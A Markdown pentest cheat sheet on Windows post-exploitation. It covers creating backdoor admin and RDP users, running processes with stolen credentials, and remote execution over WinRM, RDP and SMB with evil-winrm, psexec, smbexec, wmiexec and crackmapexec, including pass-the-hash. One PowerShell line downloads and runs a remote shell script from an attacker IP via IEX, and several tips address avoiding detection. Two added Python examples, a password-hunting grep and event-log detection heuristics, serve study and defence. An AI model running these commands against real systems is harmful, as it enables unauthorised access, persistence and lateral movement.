# Windows

## Introduction

In this section, you will find several useful commands for the Post-Exploitation phase in Windows systems.

## User

### Creating a user

```cmd
net user <USERNAME> <PASSWORD> /add
```

### Add a user to a group

```cmd
net localgroup Administrators <USERNAME> /add
```

### Add a user to the RDP group

By default, a user cannot log in through RDP unless it is a member of the "Remote Desktop Users" group.

```cmd
net localgroup "Remote Desktop Users" <USERNAME> /add
```

### Powershell credentials and how to use them

If you have obtained credentials and want to perform an action as that account, you can do so from PowerShell.

```powershell
# Store the credentials in a PSCredential object
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
# Launch a process as that user
Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred
```

## Recursive Grep (Powershell)

There is no native grep command on Windows, but PowerShell can achieve something similar.

```powershell
# Bracketed parameters are optional include/exclude filters
Get-ChildItem -Recurse [-Include *.config,*.txt,*.ini] [-Exclude *.dll,*.exe,*.jar] | Select-String "<STRING>" -List | Select-Object -ExpandProperty Path | Out-String
# Shorter version
dir -Recurse *.* | sls -Pattern "foobar" | select -Unique Path
```
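The same recursive search written in Python, as an added example that is not part of the original page: it mirrors the Get-ChildItem | Select-String pipeline above (include and exclude globs, unique matching paths) and handles the two cases the one-liner silently ignores, unreadable files and binary content. The `make_sample_tree` helper and the files it creates are constructed for the demonstration; the function names are my own.

```python
"""Recursive "grep" mirroring Get-ChildItem -Recurse | Select-String -List.

Added example; not from the original page. Returns the unique paths
(relative to root) whose text contains the pattern.
"""
import fnmatch
import os
import re
import tempfile


def recursive_grep(root, pattern, include=("*",), exclude=(), ignore_case=True):
    """Walk `root`, keep files matching any `include` glob and no `exclude`
    glob, and return the sorted relative paths whose contents match `pattern`."""
    regex = re.compile(pattern, re.IGNORECASE if ignore_case else 0)
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not any(fnmatch.fnmatch(name, g) for g in include):
                continue
            if any(fnmatch.fnmatch(name, g) for g in exclude):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                # Locked or permission-denied files: skip, like Select-String's
                # non-terminating errors, instead of aborting the whole search.
                continue
            if b"\x00" in data[:8192]:
                # Crude binary check: a NUL byte in the first 8 KiB means this
                # is not a text file worth reporting.
                continue
            if regex.search(data.decode("utf-8", errors="ignore")):
                hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


def make_sample_tree():
    """Build a small constructed directory tree and return its root."""
    root = tempfile.mkdtemp(prefix="grep_demo_")
    files = {
        "web.config": '<add key="ConnectionString" value="Server=db;Password=S3cret!" />',
        "notes.txt": "nothing to see here",
        "app/settings.ini": "db_password = S3cret!\n",
        # Binary-looking file that mentions the word but must be skipped.
        "bin/tool.exe": "PASSWORD inside a binary\x00\x01\x02",
    }
    for rel, text in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    demo_root = make_sample_tree()
    print(recursive_grep(demo_root, "password",
                         include=("*.config", "*.txt", "*.ini"),
                         exclude=("*.dll", "*.exe", "*.jar")))
```

Used with the same include/exclude lists as the PowerShell one-liner, the binary file is dropped twice over (by the exclude glob and by the NUL-byte check), so the result is the two configuration files that actually hold a plaintext password.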

## Remote Command Execution

During a pentest, it is quite common to obtain credentials that can be used to access other machines. However, most Windows machines lack CLI services such as SSH for executing commands remotely. Nonetheless, other Windows services can be used to achieve the same result.

### WinRM

**Port**: 5985

Windows Remote Management (WinRM) is a protocol that allows systems to access and exchange management information. An attacker can use this protocol to obtain RCE.

To check who is allowed to use WinRM, run the following command.

```powershell
(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
# If the service is disabled, you can enable it with the following command
Enable-PSRemoting -Force
```

During the session, the commands you type are executed on the remote computer, as if you were typing them there directly, but you can have only one interactive session at a time.

```powershell
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
Enter-PSSession -ComputerName <IP> -Credential $cred
```

As an alternative, you can use tools like **evil-winrm** or **crackmapexec** to execute commands.

```bash
evil-winrm -u <USERNAME> {-p <PASSWORD> | -H <HASH>} -i <TARGET_IP>
crackmapexec winrm <IP> -d <DOMAIN> -u <USER> {-H <HASH> | -p <PASSWORD>} -X 'whoami'
```

### Remote Desktop (RDP)

**Port**: 3389

If the user is a member of the "Remote Desktop Users" group and port 3389 is reachable, an attacker with that user's credentials can connect to the victim's computer.

```bash
rdesktop -u <USER> -p '<PASSWORD>' <IP>
xfreerdp +compression +toggle-fullscreen +clipboard /cert-ignore /dynamic-resolution /u:<USERNAME> /p:'<PASSWORD>' /v:<IP>
```

> :warning: Use Impacket `tstool` to check whether the user is already connected, avoiding being detected.
>
> ```bash
> impacket-tstool.py '<DOMAIN>/<USERNAME>:<PASSWORD>'@<IP> qwinsta
> SESSIONNAME  USERNAME                 ID  STATE         Desktop   ConnectTime          DisconnectTime
> ============ ======================== === ============= ========= ==================== ====================
> Services                              0   Disconnected            None                 None
> Console                               1   Connected     Locked    2025/03/02 13:52:43  None
> RDP-Tcp#0    .\Administrator          2   Active        Unlocked  2025/03/03 07:23:07  2025/03/03 07:23:07
> ```

* `/dynamic-resolution`: Allows resizing the window, adjusting the remote screen resolution to match.
* `/size:<WIDTH>x<HEIGHT>`: Sets a fixed size for machines that do not resize automatically with `/dynamic-resolution`.
* `+clipboard`: Enables clipboard sharing between the local and remote machines.
* `/drive:<LOCAL_DIRECTORY>,<SHARE_NAME>`: Creates a shared drive between the attacking machine and the target.

**Note:** A useful directory to share is the `/usr/share/windows-resources` directory in Kali, because it contains several Windows tools like Mimikatz.

### SMB

**Port**: 445

The SMB service allows an attacker to execute code remotely on a Windows system, as long as they hold a valid account on that machine with sufficient permissions to create and start a service.

There are different tools that can achieve this goal, each one in its own way.

### PsExec

Uploads a service binary with an arbitrary name to `ADMIN$`. The resulting shell is not interactive, so programs such as PowerShell, vssadmin and plink will cause the service to fail.

Furthermore, there is a high probability of being detected by AVs or EDRs.

```bash
psexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD>]@<TARGET>
```

### SmbExec

Creates a service in the same way as PsExec, but without dropping any binary on the host, so it is stealthier than PsExec. However, it is still a non-interactive shell.

```bash
smbexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD>]@<TARGET>
```

### Crackmapexec

```bash
# Execute PowerShell
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -X '$PSVersionTable'
# Execute a command
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -x whoami
# Pass-the-Hash
crackmapexec smb 10.10.10.10 -u '<username>' -H <NTHASH> -x whoami
```

### WMIexec

Creates a semi-interactive shell without installing any service or agent, making it the stealthiest of the tools mentioned above.

```bash
wmiexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD>]@<TARGET>
```
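From the defender's side, the WinRM, RDP and SMB-based tools above each leave a characteristic trace on the target (a RemoteInteractive logon, a `wsmprovhost.exe` process, a service installed with an odd binary path, or a `cmd.exe /Q /c` spawned under WMI with its output redirected to an admin share). The following is an added example, not part of the original page, that runs simple heuristics for those traces over constructed Windows event records. Field names follow the Security and System log schema (EventID, LogonType, NewProcessName, ParentProcessName, CommandLine, ImagePath); the sample records, service names and command shapes are constructed to resemble what these tools produce, not captured telemetry, and the function names are my own.

```python
"""Detection heuristics for the remote-execution techniques in this section.

Added example (not from the original page). Each record is a flattened
Windows event; SAMPLE_EVENTS are constructed, not real telemetry.
  4624 LogonType 10                                  -> RDP (RemoteInteractive) logon
  4688 wsmprovhost.exe starting                      -> WinRM / PowerShell remoting session
  7045 ImagePath directly under the Windows root     -> psexec-style binary dropped via ADMIN$
  7045 ImagePath that is a cmd.exe /Q /c one-liner   -> smbexec-style service
  4688 cmd.exe /Q /c under WmiPrvSE.exe with output redirected to a share -> wmiexec-style
"""
import re

# Service whose "binary" is really a cmd.exe one-liner (smbexec shape).
CMD_SERVICE = re.compile(r"(?:%COMSPEC%|cmd\.exe)\s+/Q\s+/c\b", re.IGNORECASE)
# Service binary sitting straight in %SystemRoot% (what ADMIN$ maps to), not in System32.
WINROOT_BINARY = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)
# cmd.exe /Q /c ... with stdout/stderr redirected to an admin share (wmiexec shape).
SHARE_REDIRECT = re.compile(r"/Q\s+/c\b.*>\s*\\\\\S+\\(?:ADMIN|C)\$\\", re.IGNORECASE)

SAMPLE_EVENTS = [  # constructed records
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "Administrator", "IpAddress": "10.10.14.7"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "svc_backup", "IpAddress": "10.10.14.7"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "ParentProcessName": r"C:\Windows\System32\svchost.exe", "CommandLine": "wsmprovhost.exe -Embedding"},
    {"EventID": 7045, "ServiceName": "XyZaBcDe", "ImagePath": r"%SystemRoot%\XyZaBcDe.exe"},
    {"EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1741000000.12 2>&1"},
    # Benign: a normal vendor service and a console logon.
    {"EventID": 7045, "ServiceName": "VendorUpdater", "ImagePath": r"C:\Program Files\Vendor\updater.exe"},
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "alice", "IpAddress": "-"},
]

CONTEXT_ONLY = {"network-logon"}  # useful for correlation, not an alert by itself


def classify(event):
    """Return a label for one event, or None when nothing about it is notable."""
    eid = event.get("EventID")
    if eid == 4624:
        if event.get("LogonType") == 10:
            return "rdp-logon"
        if event.get("LogonType") == 3:
            return "network-logon"  # WinRM, SMB and WMI all arrive as type 3
        return None
    if eid == 4688:
        proc = event.get("NewProcessName", "").lower()
        parent = event.get("ParentProcessName", "").lower()
        cmd = event.get("CommandLine", "")
        if proc.endswith("\\wsmprovhost.exe"):
            return "winrm-session"
        if proc.endswith("\\cmd.exe") and parent.endswith("\\wmiprvse.exe") and SHARE_REDIRECT.search(cmd):
            return "wmiexec-style"
        return None
    if eid == 7045:
        path = event.get("ImagePath", "")
        if CMD_SERVICE.search(path):
            return "smbexec-style"
        if WINROOT_BINARY.match(path):
            return "psexec-style"
        return None
    return None


def detect(events):
    """Return (index, label, event) for every event worth alerting on."""
    findings = []
    for i, ev in enumerate(events):
        label = classify(ev)
        if label and label not in CONTEXT_ONLY:
            findings.append((i, label, ev))
    return findings


def labels(events):
    """Just the alert labels, in event order."""
    return [label for _, label, _ in detect(events)]


if __name__ == "__main__":
    for i, label, ev in detect(SAMPLE_EVENTS):
        print(f"[{i}] {label}: {ev}")
```

The type-3 network logon is deliberately kept as context rather than an alert: on its own it is how every SMB or WinRM connection looks, and it only becomes interesting when paired with one of the process or service events that follow it from the same source.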
